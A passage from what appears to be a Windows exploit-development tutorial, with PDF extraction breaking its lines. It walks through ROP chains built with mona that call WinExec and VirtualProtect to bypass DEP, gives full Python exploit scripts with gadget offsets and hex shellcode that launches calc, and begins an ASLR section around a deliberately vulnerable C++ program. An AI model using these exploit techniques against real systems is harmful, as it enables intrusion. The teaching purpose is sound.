directly on the stack. Unfortunately the address of the string won’t be constant so we’ll have to compute it at 
runtime.
 
First of all, we’ll find all the interesting gadgets in 
kernel32.dll
, 
ntdll
 and 
msvcr120.dll
. We’ll use 
mona
 
(
article
) once again. If you didn’t do so, set mona’s 
working directory
 with:
 
!py mona config 
-
set workingfolder "C:
\
logs
\
%p"
 
You’re free to change the directory, of course. The term 
%p
 will be replaced
 each time with the name of the 
executable you’re working on.
 
Here’s the command to find the rops:
 
!py mona rop 
-
m kernel32.dll,ntdll,msvcr120.dll
 
This will output a lot of data and generate the following files (located in the directory specified above):
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 134 
-
 

 
r
op.txt
 

 
rop_chains.txt
 

 
rop_suggestions.txt
 

 
stackpivot.txt
 
Review the files to see what kind of information they contain.
 
To call 
WinExec
 and 
ExitThread
, we need to set up the stack this way:
 
  
cmd:  "calc"
 
        ".exe"
 
        0
 
        WinExec       <
---
--
 ESP
 
        ExitThread
 
        cmd                  # arg1 of WinExec
 
        5                    # arg2 (uCmdShow) of WinExec
 
        ret_for_ExitThread   # not used
 
        dwExitCode           # arg1 of ExitThread
 
If we execute 
RET
 when 
ESP
 points a
t the location indicated above, 
WinExec
 will be executed. 
WinExec
 
terminates with a 
RETN 8
 instruction which extract the address of ExitThread from the stack, jumps to 
ExitThread
 and remove the two arguments from the stack (by incrementing 
ESP
 by 8). 
ExitT
hread
 will use 
dwExitCode
 located on the stack but won’t return.
 
There are two problems with this schema:
 
1
.
 
some bytes are null;
 
2
.
 
cmd
 is non
-
constant so the 
arg1
 of 
WinExec
 must be fixed at runtime.
 
Note that in our case, since all the data is read from file 
through 
fread()
, we don’t need to avoid null bytes. 
Anyway, to make things more interesting, we’ll pretend that no null bytes may appear in our ROP chain. 
Instead of 5 (
SW_SHOW
), we can use 
0x01010101
 which seems to work just fine. The first null dword is 
used to terminate the 
cmd
 string so we’ll need to replace it with something like 
0xffffffff
 and zero it out at 
runtime. Finally, we’ll need to write 
cmd
 (i.e. the address of the string) on the stack at runtime.
 
The approach is this:
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 135 
-
 
 
First, we skip (by incrementing 
ESP
) the part of the stack we want to fix. Then we fix that part and, finally, 
we jump back (by decrementing 
ESP
) to the 
part we fixed and “execute it” (only in a sense, since this is 
ROP).
 
Here’s a Python script which creates 
name.dat
:
 
Python
 
 
import
 
struct
 
 
def
 
write_file
(
file_path
):
 
    
# NOTE: The rop_chain can't contain any null bytes.
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 136 
-
 
    
msvcr120
 
=
 
0x6cf70000
 
    
k
ernel32
 
=
 
0x77120000
 
    
ntdll
 
=
 
0x77630000
 
 
WinExec
 
=
 
kernel32
 
+
 
0x92ff1
 
    
ExitThread
 
=
 
ntdll
 
+
 
0x5801c
 
    
lpCmdLine
 
=
 
0xffffffff
 
    
uCmdShow
 
=
 
0x01010101
 
    
dwExitCode
 
=
 
0xffffffff
 
    
ret_for_ExitThread
 
=
 
0xffffffff
 
 
# These are just padd
ing values.
 
    
for_ebp
 
=
 
0xffffffff
 
    
for_ebx
 
=
 
0xffffffff
 
    
for_esi
 
=
 
0xffffffff
 
    
for_retn
 
=
 
0xffffffff
 
 
rop_chain
 
=
 
[
 
        
msvcr120
 
+
 
0xc041d
,
  
# ADD ESP,24 # POP EBP # RETN
 
# cmd:
 
        
"calc"
,
 
        
".exe"
,
 
# cmd+8:
 
        
0xffffff
ff
,
          
# zeroed out at runtime
 
# cmd+0ch:
 
        
WinExec
,
 
        
ExitThread
,
 
# cmd+14h:
 
        
lpCmdLine
,
           
# arg1 of WinExec (computed at runtime)
 
        
uCmdShow
,
            
# arg2 of WinExec
 
        
ret_for_ExitThread
,
  
# not used
 
    
dwExitCode
,
          
# arg1 of ExitThread
 
# cmd+24h:
 
        
for_ebp
,
 
        
ntdll
 
+
 
0xa3f07
,
     
# INC ESI # PUSH ESP # MOV EAX,EDI # POP EDI # POP ESI # POP EBP # RETN 0x04
 
        
# now edi = here
 
 
# here:
 
        
for_esi
,
 
        
for_ebp
,
 
       
msvcr120
 
+
 
0x45042
,
  
# XCHG EAX,EDI # RETN
 
        
for_retn
,
 
        
# now eax = here
 
 
msvcr120
 
+
 
0x92aa3
,
  
# SUB EAX,7 # POP EBX # POP EBP # RETN
 
        
for_ebx
,
 
        
for_ebp
,
 
        
msvcr120
 
+
 
0x92aa3
,
  
# SUB EAX,7 # POP EBX # POP EBP # RE
TN
 
        
for_ebx
,
 
        
for_ebp
,
 
        
msvcr120
 
+
 
0x92aa3
,
  
# SUB EAX,7 # POP EBX # POP EBP # RETN
 
        
for_ebx
,
 
        
for_ebp
,
 
        
msvcr120
 
+
 
0x92aa3
,
  
# SUB EAX,7 # POP EBX # POP EBP # RETN
 
        
for_ebx
,
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 137 
-
 
        
for_ebp
,
 
        
msvcr12
0
 
+
 
0x92aa3
,
  
# SUB EAX,7 # POP EBX # POP EBP # RETN
 
        
for_ebx
,
 
        
for_ebp
,
 
        
msvcr120
 
+
 
0xbfe65
,
  
# SUB EAX,2 # POP EBP # RETN
 
        
for_ebp
,
 
        
kernel32
 
+
 
0xb7804
,
  
# INC EAX # RETN
 
        
# now eax = cmd+8
 
 
# do [cmd+8]
 = 0:
 
        
msvcr120
 
+
 
0x76473
,
  
# XOR ECX,ECX # XCHG ECX,DWORD PTR [EAX] # POP ESI # POP EBP # RETN
 
        
for_esi
,
 
        
for_ebp
,
 
        
msvcr120
 
+
 
0xbfe65
,
  
# SUB EAX,2 # POP EBP # RETN
 
        
for_ebp
,
 
        
# now eax+0eh = cmd+14h (i.e. eax = 
cmd+6)
 
 
# do ecx = eax:
 
        
msvcr120
 
+
 
0x3936b
,
  
# XCHG EAX,ECX # MOV EDX,653FB4A5 # RETN
 
        
kernel32
 
+
 
0xb7a0a
,
  
# XOR EAX,EAX # RETN
 
        
kernel32
 
+
 
0xbe203
,
  
# XOR EAX,ECX # POP EBP # RETN 0x08
 
        
for_ebp
,
 
        
msvcr120
 
+
 
0x
bfe65
,
  
# SUB EAX,2 # POP EBP # RETN
 
        
for_retn
,
 
        
for_retn
,
 
        
for_ebp
,
 
        
msvcr120
 
+
 
0xbfe65
,
  
# SUB EAX,2 # POP EBP # RETN
 
        
for_ebp
,
 
        
msvcr120
 
+
 
0xbfe65
,
  
# SUB EAX,2 # POP EBP # RETN
 
        
for_ebp
,
 
        
# now ea
x = cmd
 
 
msvcr120
 
+
 
0x3936b
,
  
# XCHG EAX,ECX # MOV EDX,653FB4A5 # RETN
 
        
# now eax+0eh = cmd+14h
 
        
# now ecx = cmd
 
 
kernel32
 
+
 
0xa04fc
,
  
# MOV DWORD PTR [EAX+0EH],ECX # POP EBP # RETN 0x10
 
        
for_ebp
,
 
        
msvcr120
 
+
 
0
x3936b
,
  
# XCHG EAX,ECX # MOV EDX,653FB4A5 # RETN
 
        
for_retn
,
 
        
for_retn
,
 
        
for_retn
,
 
        
for_retn
,
 
        
msvcr120
 
+
 
0x1e47e
,
  
# ADD EAX,0C # RETN
 
        
# now eax = cmd+0ch
 
 
# do esp = cmd+0ch:
 
        
kernel32
 
+
 
0x489c0
,
  
# XCHG EAX,ESP # RETN
 
    
]
 
 
rop_chain
 
=
 
''
.
join
([
x
 
if
 
type
(
x
)
 
==
 
str
 
else
 
struct
.
pack
(
'<I'
,
 
x
)
 
                         
for
 
x
 
in
 
rop_chain
])
 
 
with
 
open
(
file_path
,
 
'wb'
)
 
as
 
f
:
 
        
ret_eip
 
=
 
kernel32
 
+
 
0xb7805
            
# RETN
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 138 
-
 
        
name
 
=
 
'a'
*
36
 
+
 
struct
.
pack
(
'<I'
,
 
ret_eip
)
 
+
 
rop_chain
 
        
f
.
write
(
name
)
 
 
write_file
(
r'c:
\
name.dat'
)
 
 
The chain of gadgets is quite convoluted, so you should take your time to understand it. You may want to 
debug it in WinDbg. Start WinDbg, load 
exploitm
e3.exe
 and put a breakpoint on the ret instruction of the 
main function:
 
bp exploitme3!main+0x86
 
Then hit 
F5
 (go) and begin to step (
F10
) through the code. Use 
dd esp
 to look at the stack now and then.
 
Here’s a simpler description of what happens to help y
ou understand better:
 
    
esp += 0x24+4              
# ADD ESP,24 # POP EBP # RETN
 
                               # This "jumps" to "skip" 
------------------------
+
 
# cmd:                                                                          |
 
 
 "calc
"                                                                      |
 
 
 ".exe"                                                                      |
 
# cmd+8:                                                                        |
 
 
 0xffffffff,
 
 
       # zeroed out at runtime                          |
 
# cmd+0ch:                                                                      |
 
 
 WinExec     <
----------------------------------------------------------------
)
---------------------------
+
 
 
 ExitThread                                                                  |                            |
 
# cmd+14h:                                                                      |                            |
 
 
 lpCmdLine 
 
 
       # a
rg1 of WinExec (computed at runtime)          |                            |
 
 
 uCmdShow 
 
 
       # arg2 of WinExec                                |                            |
 
 
 ret_for_ExitThread 
 
       # not used                           
            |                            |
 
 
 dwExitCode 
 
 
       # arg1 of ExitThread                             |                            |
 
# cmd+24h:                                                                      |                     
       |
 
 
 for_ebp                                                                     |                            |
 
                                                                                |                            |
 
skip:           <
--------
-------------------------------------------------------
+                            |
 
    edi = esp                  # INC ESI # PUSH ESP # MOV EAX,EDI # POP EDI # POP ESI # POP EBP # RETN 0x04  |
 
                               # 
----
> now edi = here      
                                                  |
 
# here:
 
 
     |
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 139 
-
 
    eax = edi                  # XCHG EAX,EDI # RETN                                         
                |
 
                               # 
----
> now eax = here                                                        |
 
 
     |
 
    eax 
-
= 36   
               # SUB EAX,7 # POP EBX # POP EBP # RETN                                        |
 
                               # SUB EAX,7 # POP EBX # POP EBP # RETN                                        |
 
                               # SUB EAX,7 # POP E
BX # POP EBP # RETN                                        |
 
                               # SUB EAX,7 # POP EBX # POP EBP # RETN                                        |
 
                               # SUB EAX,7 # POP EBX # POP EBP # RETN               
                         |
 
                               # SUB EAX,2 # POP EBP # RETN                                                  |
 
                               # INC EAX # RETN                                                              |
 
       
                        # 
----
> now eax = cmd+8 (i.e. eax 
--
> value to zero
-
out)                      |
 
 
     |
 
    dword ptr [eax] = 0        # XOR ECX,
ECX # XCHG ECX,DWORD PTR [EAX] # POP ESI # POP EBP # RETN           |
 
 
     |
 
    eax 
-
= 2                   # SUB EAX,2 # POP EBP # RETN                
                                  |
 
                               # 
----
> now eax+0eh = cmd+14h (i.e. eax+0eh 
--
> lpCmdLine on the stack)       |
 
 
|
 
    ecx = eax                  # XCHG EAX,ECX # MOV EDX,653FB4A5 # RETN                                      |
 
                               # XOR EAX,EAX # RETN                                                          |
 
                               #
 XOR EAX,ECX # POP EBP # RETN 0x08                                           |
 
 
     |
 
    eax 
-
= 6                   # SUB EAX,2 # POP EBP # RETN       
                                           |
 
                               # SUB EAX,2 # POP EBP # RETN                                                  |
 
                               # SUB EAX,2 # POP EBP # RETN                                         
         |
 
                               # 
----
> now eax = cmd                                                         |
 
 
     |
 
    swap(eax,ecx)      
        # XCHG EAX,ECX # MOV EDX,653FB4A5 # RETN                                      |
 
                               # 
----
> now eax+0eh = cmd+14h                                                 |
 
                               # 
----
> now ecx = cmd     
                                                    |
 
                                                                                                             |
 
    [eax+0eh] = ecx            # MOV DWORD PTR [EAX+0EH],ECX # POP EBP # RETN 0x10         
                  |
 
                                                                                                             |
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 140 
-
 
    eax = ecx                  # XCHG EAX,ECX # MOV EDX,653FB4A5 # RETN                                      |
 
    eax += 12 
                 # ADD EAX,0C # RETN                                                           |
 
                               # 
----
> now eax = cmd+0ch                                                     |
 
    esp = eax                  # XCHG EAX,ESP # 
RETN                                                         |
 
                               # This "jumps" to cmd+0ch 
----------------------------------------------------
+
 
Disabling DEP
 
It turns out that DEP can be disabled programmatically. The problem 
with DEP is that some applications 
might not work with it, so it needs to be highly configurable.
 
At a global level, DEP can be
 

 
AlwaysOn
 

 
AlwaysOff
 

 
OptIn
: DEP is enabled only for system processes and applications chosen by the user.
 

 
OptOut
: DEP is enabled f
or every application except for those explicitly excluded by the user.
 
DEP can also be enabled or disabled on a per
-
process basis by using 
SetProcessDEPPolicy
.
 
There are various ways to bypass DEP:
 

 
VirtualProtect()
 to make memory executable.
 

 
VirtualAlloc()
 to allocate executable memory.
 
Note: 
VirtualAlloc()
 can be used to commit memory already committed by specifying its address. To make 
a page executable, it’s enough to allocate a single byte (length = 1) of that page!
 

 
HeapCreate()
 + 
HeapAlloc()
 + copy mem
ory.
 

 
SetProcessDEPPolicy()
 to disable DEP. It doesn’t work if DEP is 
AlwaysOn
 or if 
SetProcessDEPPolicy()
 has already been called for the current process.
 

 
NtSetInformationProcess()
 to disable DEP. It fails if DEP is 
AlwaysON
 or if the module was compiled 
w
ith 
/NXCOMPAT
 or if the function has been already called by the current process.
 
Here’s a useful table from 
Team Corelan
:
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 141 
-
 
 
If you l
ook at the file 
rop_chains.txt
, you’ll see that mona generated a chain for 
VirtualProtect
. Let’s use it!
 
First of all, let’s have a look at 
VirtualProtect
. Its signature is as follows:
 
BOOL WINAPI VirtualProtect(
 
  _In_   LPVOID lpAddress,
 
  _In_   SIZE_T 
dwSize,
 
  _In_   DWORD flNewProtect,
 
  _Out_  PDWORD lpflOldProtect
 
);
 
This function modifies the protection attributes of the pages associated with the specified area of memory. 
We will use 
flNewProtect = 0x40
 (
PAGE_EXECUTE_READWRITE
). By making the porti
on of the stack 
containing our shellcode executable again, we can execute the shellcode like we did before.
 
Here’s the chain for Python built by mona:
 
Python
 
 
def
 
create_rop_chain
():
 
 
# rop chain generated with mona.py 
-
 www.corelan.be
 
  
rop_gadgets
 
=
 
[
 
    
0x6d02f868
,
  
# POP EBP # RETN [MSVCR120.dll]
 
    
0x6d02f868
,
  
# skip 4 bytes [MSVCR120.dll]
 
    
0x6cf8c658
,
  
# POP EBX # RETN [MSVCR120.dll]
 
    
0x00000201
,
  
# 0x00000201
-
> ebx
 
    
0x6d02edae
,
  
# POP EDX # RETN [MSVCR120.dll]
 
    
0x00000040
,
  
# 0x0000
0040
-
> edx
 
    
0x6d04b6c4
,
  
# POP ECX # RETN [MSVCR120.dll]
 
    
0x77200fce
,
  
# &Writable location [kernel32.dll]
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 142 
-
 
    
0x776a5b23
,
  
# POP EDI # RETN [ntdll.dll]
 
    
0x6cfd8e3d
,
  
# RETN (ROP NOP) [MSVCR120.dll]
 
    
0x6cfde150
,
  
# POP ESI # RETN [MSVCR120.dll]
 
    
0x7765e8ae
,
  
# JMP [EAX] [ntdll.dll]
 
    
0x6cfc0464
,
  
# POP EAX # RETN [MSVCR120.dll]
 
    
0x6d0551a4
,
  
# ptr to &VirtualProtect() [IAT MSVCR120.dll]
 
    
0x6d02b7f9
,
  
# PUSHAD # RETN [MSVCR120.dll]
 
    
0x77157133
,
  
# ptr to 'call esp' [kernel32.dll]
 
  
]
 
  
return
 
''
.
join
(
struct
.
pack
(
'<I'
,
 
_
)
 
for
 
_
 
in
 
rop_gadgets
)
 
 
The idea of this chain is simple: first we put the right values in the registers and then we push all the 
registers on the stack with 
PUSHAD
. As before, let’s try to avoid null bytes. As you ca
n see, this chain 
contains some null bytes. I modified the chain a bit to avoid that.
 
Read the following code very carefully paying special attention to the comments:
 
Python
 
 
import
 
struct
 
 
# The signature of VirtualProtect is the following:
 
#   BOOL WINA
PI VirtualProtect(
 
#     _In_   LPVOID lpAddress,
 
#     _In_   SIZE_T dwSize,
 
#     _In_   DWORD flNewProtect,
 
#     _Out_  PDWORD lpflOldProtect
 
#   );
 
 
# After PUSHAD is executed, the stack looks like this:
 
#   .
 
#   .
 
#   .
 
#   EDI (ptr to ROP NOP (RET
N))          <
----------------------------
 current ESP
 
#   ESI (ptr to JMP [EAX] (EAX = address of ptr to VirtualProtect))
 
#   EBP (ptr to POP (skips EAX on the stack))
 
#   ESP (lpAddress (automatic))
 
#   EBX (dwSize)
 
#   EDX (NewProtect (0x40 = PAGE_EXECU
TE_READWRITE))
 
#   ECX (lpOldProtect (ptr to writeable address))
 
#   EAX (address of ptr to VirtualProtect)
 
# lpAddress:
 
#   ptr to "call esp"
 
#   <shellcode>
 
 
msvcr120
 
=
 
0x6cf70000
 
kernel32
 
=
 
0x77120000
 
ntdll
 
=
 
0x77630000
 
 
def
 
create_rop_chain
():
 
    
fo
r_edx
 
=
 
0xffffffff
 
 
# rop chain generated with mona.py 
-
 www.corelan.be (and modified by me).
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 143 
-
 
    
rop_gadgets
 
=
 
[
 
        
msvcr120
 
+
 
0xbf868
,
  
# POP EBP # RETN [MSVCR120.dll]
 
        
msvcr120
 
+
 
0xbf868
,
  
# skip 4 bytes [MSVCR120.dll]
 
 
# ebx =
 0x400 (dwSize)
 
        
msvcr120
 
+
 
0x1c658
,
  
# POP EBX # RETN [MSVCR120.dll]
 
        
0x11110511
,
 
        
msvcr120
 
+
 
0xdb6c4
,
  
# POP ECX # RETN [MSVCR120.dll]
 
        
0xeeeefeef
,
 
        
msvcr120
 
+
 
0x46398
,
  
# ADD EBX,ECX # SUB AL,24 # POP EDX # RETN [MSVCR
120.dll]
 
        
for_edx
,
 
 
# edx = 0x40 (NewProtect = PAGE_EXECUTE_READWRITE)
 
        
msvcr120
 
+
 
0xbedae
,
  
# POP EDX # RETN [MSVCR120.dll]
 
        
0x01010141
,
 
        
ntdll
 
+
 
0x75b23
,
     
# POP EDI # RETN [ntdll.dll]
 
        
0xfefefeff
,
 
        
ms
vcr120
 
+
 
0x39b41
,
  
# ADD EDX,EDI # RETN [MSVCR120.dll]
 
 
msvcr120
 
+
 
0xdb6c4
,
  
# POP ECX # RETN [MSVCR120.dll]
 
        
kernel32
 
+
 
0xe0fce
,
  
# &Writable location [kernel32.dll]
 
        
ntdll
 
+
 
0x75b23
,
     
# POP EDI # RETN [ntdll.dll]
 
        
msvcr12
0
 
+
 
0x68e3d
,
  
# RETN (ROP NOP) [MSVCR120.dll]
 
        
msvcr120
 
+
 
0x6e150
,
  
# POP ESI # RETN [MSVCR120.dll]
 
        
ntdll
 
+
 
0x2e8ae
,
     
# JMP [EAX] [ntdll.dll]
 
        
msvcr120
 
+
 
0x50464
,
  
# POP EAX # RETN [MSVCR120.dll]
 
        
msvcr120
 
+
 
0xe51a4
,
  
# addr
ess of ptr to &VirtualProtect() [IAT MSVCR120.dll]
 
        
msvcr120
 
+
 
0xbb7f9
,
  
# PUSHAD # RETN [MSVCR120.dll]
 
        
kernel32
 
+
 
0x37133
,
  
# ptr to 'call esp' [kernel32.dll]
 
    
]
 
    
return
 
''
.
join
(
struct
.
pack
(
'<I'
,
 
_
)
 
for
 
_
 
in
 
rop_gadgets
)
 
 
def
 
write_f
ile
(
file_path
):
 
    
with
 
open
(
file_path
,
 
'wb'
)
 
as
 
f
:
 
        
ret_eip
 
=
 
kernel32
 
+
 
0xb7805
            
# RETN
 
        
shellcode
 
=
 
(
 
            
"
\
xe8
\
xff
\
xff
\
xff
\
xff
\
xc0
\
x5f
\
xb9
\
x11
\
x03
\
x02
\
x02
\
x81
\
xf1
\
x02
\
x02"
 
+
 
            
"
\
x02
\
x02
\
x83
\
xc7
\
x1d
\
x33
\
xf6
\
xfc
\
x8a
\
x07
\
x3c
\
x02
\
x0f
\
x44
\
xc6
\
xaa"
 
+
 
            
"
\
xe2
\
xf6
\
x55
\
x8b
\
xec
\
x83
\
xec
\
x0c
\
x56
\
x57
\
xb9
\
x7f
\
xc0
\
xb4
\
x7b
\
xe8"
 
+
 
            
"
\
x55
\
x02
\
x02
\
x02
\
xb9
\
xe0
\
x53
\
x31
\
x4b
\
x8b
\
xf8
\
xe8
\
x49
\
x02
\
x02
\
x02"
 
+
 
            
"
\
x8b
\
xf0
\
xc7
\
x45
\
xf4
\
x63
\
x61
\
x6c
\
x63
\
x6a
\
x05
\
x8d
\
x45
\
xf4
\
xc7
\
x45"
 
+
 
            
"
\
xf8
\
x2e
\
x65
\
x78
\
x65
\
x50
\
xc6
\
x45
\
xfc
\
x02
\
xff
\
xd7
\
x6a
\
x02
\
xff
\
xd6"
 
+
 
            
"
\
x5f
\
x33
\
xc0
\
x5e
\
x8b
\
xe5
\
x5d
\
xc3
\
x33
\
xd2
\
xeb
\
x10
\
xc1
\
xca
\
x0d
\
x3c"
 
+
 
            
"
\
x61
\
x0f
\
xbe
\
xc0
\
x7c
\
x03
\
x83
\
xe8
\
x20
\
x03
\
xd0
\
x41
\
x8a
\
x01
\
x
84
\
xc0"
 
+
 
            
"
\
x75
\
xea
\
x8b
\
xc2
\
xc3
\
x8d
\
x41
\
xf8
\
xc3
\
x55
\
x8b
\
xec
\
x83
\
xec
\
x14
\
x53"
 
+
 
            
"
\
x56
\
x57
\
x89
\
x4d
\
xf4
\
x64
\
xa1
\
x30
\
x02
\
x02
\
x02
\
x89
\
x45
\
xfc
\
x8b
\
x45"
 
+
 
            
"
\
xfc
\
x8b
\
x40
\
x0c
\
x8b
\
x40
\
x14
\
x8b
\
xf8
\
x89
\
x45
\
xec
\
x8b
\
xcf
\
xe8
\
xd2"
 
+
 
   
"
\
xff
\
xff
\
xff
\
x8b
\
x3f
\
x8b
\
x70
\
x18
\
x85
\
xf6
\
x74
\
x4f
\
x8b
\
x46
\
x3c
\
x8b"
 
+
 
            
"
\
x5c
\
x30
\
x78
\
x85
\
xdb
\
x74
\
x44
\
x8b
\
x4c
\
x33
\
x0c
\
x03
\
xce
\
xe8
\
x96
\
xff"
 
+
 
            
"
\
xff
\
xff
\
x8b
\
x4c
\
x33
\
x20
\
x89
\
x45
\
xf8
\
x03
\
xce
\
x33
\
xc0
\
x89
\
x4d
\
xf0"
 
+
 
            
"
\
x8
9
\
x45
\
xfc
\
x39
\
x44
\
x33
\
x18
\
x76
\
x22
\
x8b
\
x0c
\
x81
\
x03
\
xce
\
xe8
\
x75"
 
+
 
            
"
\
xff
\
xff
\
xff
\
x03
\
x45
\
xf8
\
x39
\
x45
\
xf4
\
x74
\
x1e
\
x8b
\
x45
\
xfc
\
x8b
\
x4d"
 
+
 
            
"
\
xf0
\
x40
\
x89
\
x45
\
xfc
\
x3b
\
x44
\
x33
\
x18
\
x72
\
xde
\
x3b
\
x7d
\
xec
\
x75
\
x9c"
 
+
 
            
"
\
x33
\
xc0
\
x5f
\
x5e
\
x5b
\
x8b
\
xe5
\
x5d
\
xc3
\
x8b
\
x4d
\
xfc
\
x8b
\
x44
\
x33
\
x24"
 
+
 
            
"
\
x8d
\
x04
\
x48
\
x0f
\
xb7
\
x0c
\
x30
\
x8b
\
x44
\
x33
\
x1c
\
x8d
\
x04
\
x88
\
x8b
\
x04"
 
+
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 144 
-
 
            
"
\
x30
\
x03
\
xc6
\
xeb
\
xdd"
)
 
        
name
 
=
 
'a'
*
36
 
+
 
struct
.
pack
(
'<I'
,
 
ret_eip
)
 
+
 
create_rop_chain
()
 
+
 
shellcode
 
   
f
.
write
(
name
)
 
 
write_file
(
r'c:
\
name.dat'
)
 
 
Here’s the main comment again:
 
# After PUSHAD is executed, the stack looks like this:
 
#   .
 
#   .
 
#   .
 
#   EDI (ptr to ROP NOP (RETN))
 
 
 <
----------------------------
 current ESP
 
#   ESI (ptr to JMP 
[EAX] (EAX = address of ptr to VirtualProtect))
 
#   EBP (ptr to POP (skips EAX on the stack))
 
#   ESP (lpAddress (automatic))
 
#   EBX (dwSize)
 
#   EDX (NewProtect (0x40 = PAGE_EXECUTE_READWRITE))
 
#   ECX (lpOldProtect (ptr to writeable address))
 
#   EAX (a
ddress of ptr to VirtualProtect)
 
# lpAddress:
 
#   ptr to "call esp"
 
#   <shellcode>
 
PUSHAD
 pushes on the stack the registers 
EAX
, 
ECX
, 
EDX
, 
EBX
, original 
ESP
, 
EBP
, 
ESI
, 
EDI
. The 
registers are pushed one at a time so the resulting order on the stack is reve
rsed, as you can see in the 
comment above.
 
Also note that right before 
PUSHAD
 is executed, 
ESP
 points to the last dword of the chain (
ptr to ‘call esp’ 
[kernel32.dll]
), and so 
PUSHAD
 pushes that value on the stack (
ESP (lpAddress (automatic))
). This value 
becomes 
lpAddress
 which is the starting address of the area of memory whose access protection attributes 
we want to change.
 
Afther 
PUSHAD
 is executed, 
ESP
 points to the DWORD where 
EDI
 was pushed (see 
current ESP
 above). 
In the 
PUSHAD
 gadget, 
PUSHAD
 is fol
lowed by 
RET
:
 
msvcr120 + 0xbb7f9,  # PUSHAD # RETN [MSVCR120.dll]
 
This 
RET
 pops the DWORD where 
EDI
 was pushed and jumps to a 
NOP 
gadget (
NOP
 means that it does 
nothing) which pops the DWORD where 
ESI
 was pushed and jumps to a 
JMP [EAX]
 gadget. Because 
EAX
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 145 
-
 
contains the address of a pointer to 
VirtualProtect
, that gadget jumps to 
VirtualProtect
. Note that the stack is 
set correctly for 
VirtualProtect
:
 
EBP (ptr to POP (skips EAX on the stack))             # RET EIP
 
ESP (lpAddress (automatic))                 
          # argument 1
 
EBX (dwSize)                                          # argument 2
 
EDX (NewProtect (0x40 = PAGE_EXECUTE_READWRITE))      # argument 3
 
ECX (lpOldProtect (ptr to writeable address))         # argument 4
 
When 
VirtualProtect
 ends, it jum
ps to the 
POP # RET
 gadget corresponding to 
EBP
 in the scheme above 
and remove all the arguments from the stack. Now 
ESP
 points to the DWORD on the stack corresponding to 
EAX
. The gadget 
POP # RET
 is finally executed so the 
POP
 increments 
ESP
 and the 
RET
 j
umps to the 
call 
esp
 gadget which calls the shellcode (which can now be executed).
 
By now, you’ll have noticed that I prefer expressing addresses as
 
baseAddress + RVA
 
The reason is simple: because of 
ASLR
, the addresses change but the 
RVA
s remain constant.
 
To try the code on your PC, you just need to update the base addresses. When we’ll deal with ASLR, writing 
the addresses this way will come in handy.
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 146 
-
 
Exploitme4 (ASLR)
 
 
Read the previous 3 articles if you haven’t already (
I
, 
II
, 
III
).
 
ASLR
 is an acronym for 
A
ddress 
S
pace 
L
ayout 
R
andomization. As the name suggests, the layout of the 
address space is randomized, i.e. the base addresses of the 
PEB
, the 
TEB
 and all the modules which 
support AS
LR change every time Windows is rebooted and the modules are loaded into memory. This 
makes it impossible for hackers to use hard coded addresses in their exploits. There are at least two ways to 
bypass ASLR:
 
1
.
 
Find some structure or module whose base addres
s is constant.
 
2
.
 
Exploit an 
info leak
 to determine the base addresses of structures and modules.
 
In this section we’ll build an exploit for a little program called 
exploitme4.exe
.
 
In 
VS 2013
, we’ll disable 
stack cookies
, but leave 
DEP
 on, by going to 
Project
→
properties
, and modifying 
the configuration for 
Release
 as follows:
 

 
Configuration Properties
 
o
 
C/C++
 

 
Code Generation
 

 
Security Check
: Disable Security Check (/GS
-
)
 
Make sure that DEP is activated:
 

 
Configuration Properties
 
o
 
Linker
 

 
Advanced
 

 
Data Execution Preve
ntion (DEP)
: Yes (/NXCOMPAT)
 
Here’s the code of the program:
 
C++
 
 
#include <cstdio>
 
#include <conio.h>
 
 
class
 
Name
 
{
 
    
char
 
name
[
32
];
 
    
int
 
*
ptr
;
 
 
public
:
 
    
Name
()
 
:
 
ptr
((
int
 
*)
name
)
 
{}
 
 
char
 
*
getNameBuf
()
 
{
 
return
 
name
;
 
}
 
 
int
 
readFromFi
le
(
const
 
char
 
*
filePath
)
 
{
 
        
printf
(
"Reading name from file...
\
n"
);
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 147 
-
 
 
for
 
(
int
 
i
 
=
 
0
;
 
i
 
<
 
sizeof
(
name
);
 
++
i
)
 
            
name
[
i
]
 
=
 
0
;
 
 
FILE
 
*
f
 
=
 
fopen
(
filePath
,
 
"rb"
);
 
        
if
 
(!
f
)
 
            
return
 
0
;
 
        
fseek
(
f
,
 
0L
,
 
SEEK_E
ND
);
 
        
long
 
bytes
 
=
 
ftell
(
f
);
 
        
fseek
(
f
,
 
0L
,
 
SEEK_SET
);
 
        
fread
(
name
,
 
1
,
 
bytes
,
 
f
);
 
        
fclose
(
f
);
 
        
return
 
1
;
 
    
}
 
 
virtual
 
void
 
printName
()
 
{
 
        
printf
(
"Hi, %s!
\
n"
,
 
name
);
 
    
}
 
 
virtual
 
void
 
printNameInHex
()
 
{
 
        
for
 
(
int
 
i
 
=
 
0
;
 
i
 
<
 
sizeof
(
name
)
 
/
 
4
;
 
++
i
)
 
            
printf
(
" 0x%08x"
,
 
ptr
[
i
]);
 
        
printf
(
"]
\
n"
);
 
    
}
 
};
 
 
int
 
main
()
 
{
 
    
Name
 
name
;
 
    
while
 
(
true
)
 
{
 
        
if
 
(!
name
.
readFromFile
(
"c:
\
\
name.dat"
))
 
            
return
 
-
1
;
 
        
name
.
printName
();
 
        
name
.
printNameInHex
();
 
 
printf
(
"Do you want to read the name again? [y/n] "
);
 
        
if
 
(
